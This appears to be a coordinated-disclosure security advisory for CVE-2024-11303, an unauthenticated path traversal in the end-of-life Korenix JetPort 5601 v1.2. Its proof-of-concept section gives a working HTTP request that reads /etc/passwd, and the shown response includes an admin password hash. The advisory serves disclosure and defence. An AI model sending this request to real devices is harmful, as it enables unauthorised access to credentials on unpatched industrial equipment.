Korenix JetPort 5601 1.2 Path Traversal

`St. Pölten UAS 20241118-1  
-------------------------------------------------------------------------------  
title| Path Traversal  
product| Korenix JetPort 5601  
vulnerable version| 1.2  
fixed version| -  
CVE number| CVE-2024-11303  
impact| High  
homepage| https://www.korenix.com/  
found| 2024-05-24  
by| P. Oberndorfer, B. Tösch, M. Narbeshuber-Spletzer,  
| C. Hierzer, M. Pammer  
| These vulnerabilities were discovery during research at  
| St.Pölten UAS, supported and coordinated by CyberDanube.  
|  
| https://fhstp.ac.at | https://cyberdanube.com  
-------------------------------------------------------------------------------  
  
Vendor description  
-------------------------------------------------------------------------------  
"Korenix Technology, a Beijer group company within the Industrial Communication  
business area, is a global leading manufacturer providing innovative, market-  
oriented, value-focused Industrial Wired and Wireless Networking Solutions.  
With decades of experiences in the industry, we have developed various product  
lines [...].  
  
Our products are mainly applied in SMART industries: Surveillance, Machine-to-  
Machine, Automation, Remote Monitoring, and Transportation. Worldwide customer  
base covers different Sales channels, including end-customers, OEMs, system  
integrators, and brand label partners. [...]"  
  
Source: https://www.korenix.com/en/about/index.aspx?kind=3  
  
  
Vulnerable versions  
-------------------------------------------------------------------------------  
Korenix JetPort 5601v3 / v1.2  
  
  
Vulnerability overview  
-------------------------------------------------------------------------------  
1) Path Traversal (CVE-2024-11303)  
A path traversal attack for unauthenticated users is possible. This allows  
getting access to the operating system of the device and access information  
like configuration files and connections to other hosts or potentially other  
sensitive information.  
  
  
Proof of Concept  
-------------------------------------------------------------------------------  
1) Path Traversal (CVE-2024-11303)  
By sending the following request to the following endpoint, a path traversal  
vulnerability can be triggered:  
-------------------------------------------------------------------------------  
GET /%2e%2e/%2e%2e/etc/passwd HTTP/1.1  
Host: 10.69.10.2  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: de,en-US;q=0.7,en;q=0.3  
Te: trailers  
Connection: keep-alive  
-------------------------------------------------------------------------------  
Note, that this is only possible when an interceptor proxy or a command line  
tool is used. A web browser would encode the characters and the path traversal  
would not work.  
The response to the latter request is shown below:  
-------------------------------------------------------------------------------  
HTTP/1.1 200 OK  
Server: thttpd/2.19-MX Jun 2 2022  
Content-type: text/plain; charset=iso-8859-1  
[...]  
Accept-Ranges: bytes  
Connection: Keep-Alive  
Content-length: 86  
  
root::0:0:root:/root:/bin/false  
admin:$1$$CoERg7ynjYLsj2j4glJ34.:502:502::/:/bin/true  
-------------------------------------------------------------------------------  
  
The vulnerabilities were manually verified on an emulated device by using the  
MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).  
  
  
Solution  
-------------------------------------------------------------------------------  
None. Device is End-of-Life.  
  
  
Workaround  
-------------------------------------------------------------------------------  
Limit the access to the device and place it within a segmented network.  
  
  
Recommendation  
-------------------------------------------------------------------------------  
CyberDanube recommends Korenix customers to upgrade to another device.  
  
  
Contact Timeline  
-------------------------------------------------------------------------------  
2024-09-23: Contacting Beijer Electronics Group via [email protected].  
2024-09-24: Vendor stated, that the device is end-of-life. Contact will ask the  
engineering team if there are any changes.  
2024-10-15: Vendor stated, that the advisory can be published. No further  
updates are planned for this device.  
2024-11-18: Coordinated disclosure of advisory.  
  
  
Web: https://www.fhstp.ac.at/  
Twitter: https://x.com/fh_stpoelten  
Mail: [email protected]  
  
EOF T. Weber / @2024  
  
  
`